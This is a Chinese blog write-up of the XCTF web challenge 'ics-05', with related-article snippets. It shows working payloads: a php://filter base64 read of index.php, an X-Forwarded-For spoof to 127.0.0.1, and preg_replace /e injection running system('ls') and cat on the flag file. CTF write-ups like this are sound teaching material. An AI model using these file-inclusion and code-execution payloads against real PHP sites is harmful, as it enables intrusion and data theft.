[攻防世界web]ics-05

最新推荐文章于 2023-07-12 19:00:00 发布
最新推荐文章于 2023-07-12 19:00:00 发布
阅读量153 收藏
点赞数
分类专栏: ctf-web刷题之旅
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JURUO222/article/details/107935360
版权

在这里插入图片描述
全部点一遍只能进入维修中心界面,并再次点击维修中心地址栏
http://220.249.52.133:44508/index.php?page=index

LFI漏洞的黑盒判断方法:
单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞。

这里出现了page这个参数,可以联想到文件包含漏洞LFI
参考:代码块漏洞总结
其中利用本地包含读取PHP敏感性文件,需要PHP5以上版本。
?page=php://filter/read=convert.base64-encode/resource=index.php

//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}

PHP preg_replace() 函数

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int KaTeX parse error: Expected 'EOF', got '&' at position 19: …it = -1 [, int &̲count ]] )
搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。

  • 参数说明:
    $pattern: 要搜索的模式,可以是字符串或一个字符串数组。
    $replacement: 用于替换的字符串或字符串数组。
    $subject: 要搜索替换的目标字符串或字符串数组。
  • 返回值
    如果 subject 是一个数组, preg_replace() 返回一个数组, 其他情况下返回一个字符串。
    如果匹配被查找到,替换后的 subject 被返回,其他情况下 返回没有改变的 subject。如果发生错误,返回 NULL。
  • preg_replace()存在/e 模式下的代码执行问题
    参考:Preg_Replace代码执行漏洞解析
    在/e模式下,第二个参数会被当成代码执行

故构造payload并构造ip为127.0.0.1:
?pat=/test/e&rep=system('ls')&sub=test

得到疑似flag所在位置
在这里插入图片描述
现在得到flag.php的位置
在这里插入图片描述
/index.php?pat=/test/e&rep=system('cat s3chahahaDir/flag/flag.php')&sub=test
文件位置:s3chahahaDir/flag/flag.php
在这里插入图片描述
得到flag

Diana_1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界(web篇)---ics-05
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-16 1086
根据提示点击进入设备维护中心(其他页面也点不开) 发现页面也没什么可以点击的地方,乱点了几下发现云平台设备维护中心是可以点击的,虽然还是同一个页面,但是多了个get参数 不可行读取源码看看直接包含发现会直接运行php文件,那我们怎么获得源码呢,很简单,include函数只会将php文件进行执行,我们只需要将传进去的文件先进行base64编码再传给它,就会输出它的内容了,也就是源码: $_SERVER[‘HTTP_X_FORWARDED_FOR’] 这个需要请求加 preg_replace /e参数
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界-web ics-05
m0_48108919的博客
02-19 2406
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 逐个点击菜单栏,发现只有设备维护中心有跳转 题目提示了利用后门入侵,首先使用dirsearch扫描网站目录,发现有个/index.php/login目录 尝试访问,发现页面有超链接,尝试点击 发现page的参数会原样输出 尝试使用php伪协议读取文件: php伪协议参考:https://www.cnblogs.com/endust/p/11804767.html 构造payload读取index.php..
攻防世界Webics-05
Light_inthe_eyes的博客
10-16 130
打开页面后,发现什么也没法操作: 只好代码审计,发现有一个page参数可利用,此时猜想文件包含读取网页漏洞的问题: 用php:filter//构造payload: php://filter/read=convert.base64-encode/resource=index.php 看到经过base64加密后的代码: 通过base64解密后的关键代码: if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') { echo "<br &g
攻防世界web进阶区ics-05详解
hxhxhxhxx的博客
08-06 3108
攻防世界web进阶区ics-05详解题目解法 题目 我们只能点击一个地方 解法 御剑扫描有一个css的文件 没有什么作用 发现又点了一次的时候,url发生了改变 因为是php的页面,我们试试php伪协议读取文件 http://220.249.52.133:39554/index.php?page=php://filter/read=convert.base64-encode/resource=index.php <?php error_reporting(0); @session_s
攻防世界-Web高手进阶区-ics-05
feng的博客
09-05 512
这是涉及文件包含、PHP危险函数中的preg_replace()和代码审计的一个题目
攻防世界——ics-05
m0_62063669的博客
06-21 2233
攻防世界——ics-05,打开题目场景,进入设备维护中心,将所有可点击的地方都点了一遍,发现只有设备维护中心可以打开在源代码中发现page=index写入参数,参数会在页面中显示有参数的话,可以尝试以下XSS(没有任何反应,失败)LFI(Local File Inclusion) 本地文件包含漏洞,指的是能打开并包含本地文件的漏洞 LFI漏洞的黑盒判断方法:如果只从URL判断,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键词,就可能存在文件包含漏洞。..
攻防世界 WEB ics-05
qq_41696858的博客
08-23 73
这题其实有问题页面挺好找的,因为只有一个能点进去,哈哈 设备维护中心,然后照例查看源码,发现其实并没有很多的html代码,而是通过一个形如?page=index导入进来的页面,是什么不用说了吧,文件包含 那么,base64读一下源码,php://filter/read=convert.base64-encode/resource=index.php 都回来的东西base64解码 <?php error_reporting(0); @session_start(); posix_setuid(1000)
攻防世界-web-ics-05
wuh2333的博客
07-12 469
攻防世界ics,命令注入
攻防世界WEB ics-05
qq_38969294的博客
05-18 196
isc-05 进入页面 没有什么可以利用的线索 只有设备维护中心可以点开 点进去 点击左上角发现了地址栏的变化 ?page= 似乎是伪协议题的特征 php://filter/read=convert.base64-encode/resource=index.php 直接过滤器 base64编码形式读取源码 获得源码如下 <?php error_reporting(0); @session_start(); posix_setuid(1000); php?> <!DOC
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界misc2-1杂项
11-20
攻防世界misc2-1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947409
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
[攻防世界web]shrine
JURUO222的博客
07-31 432
参考文章1 参考文章2 SSTI(服务器模板注入) sql注入是从用户获得一个输入,然后又后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。 SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornad
web_进阶_Web_python_template_injection
JURUO222的博客
08-08 355
参考文章 #flask模板注入 flask的渲染方法有render_template和render_template_string两种。 render_template()是用来渲染一个指定的文件的。使用如下 return render_template(‘index.html’) render_template_string则是用来渲染一个字符串的。SSTI与这个方法密不可分。 使用方法如下 html = ‘This is index page’ return render_template_strin
web_进阶_NewsCenter
JURUO222的博客
08-07 328
可以通过sqlmap来爆破 在框中随便输入一个test,然后用burp抓包 将抓到的数据保存在1.txt里,用sqlmap进行爆破 Python sqlmap.py -r 1.txt --dbs 爆出数据库名 继续查询数据库news Python  sqlmap.py -r 1.txt -D news --dump ...
HCTF2018-admin
JURUO222的博客
04-02 307
参考大佬博客 这道题叫admin,一进去有登录和注册选项,可能是在暗示用admin登录 随便注册一个登录 发现源码 andmin登录成功便可获得flag flask session 伪造 flask数据库操作的框架,就只能将session存储在cookie中。因为cookie实际上是存储在客户端(浏览器)中的,所以称之为“客户端session”。 flask 新建了URLSafeTimed...
sqli-labs闯关1—5(复习hhhh)
JURUO222的博客
08-07 285
参考:http://www.secist.com/archives/4880.html #SQL注入简介 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。(百度百科) ####补充知识 MySql常用注释方法:/ #(即%23) – /…/ --+ 验证有多少列:用order by 判断字段数
web-ics-05
最新发布
07-28
对于题目"web-ics-05",根据提供的引用内容,我们可以得到以下信息: - 这道题可能是在入侵后利用管理平台来完成一些信息的收集,读取文件并利用是非常重要的。\[1\] - 在源代码中有一段注释,提到要给HTTP头部添加X-forwarded-For=127.0.0.1。\[2\] - preg_replace函数可以执行正则表达式的搜索和替换。\[3\] 根据这些信息,我们可以推测"web-ics-05"可能是一道关于入侵和利用管理平台的题目,要求读取文件并进行一些操作,同时还需要使用preg_replace函数进行正则表达式的搜索和替换。具体的题目要求和操作细节可能需要进一步的信息才能确定。 #### 引用[.reference_title] - *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [攻防世界-ics-05-(详细操作)做题笔记](https://blog.csdn.net/qq_43715020/article/details/125291336)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值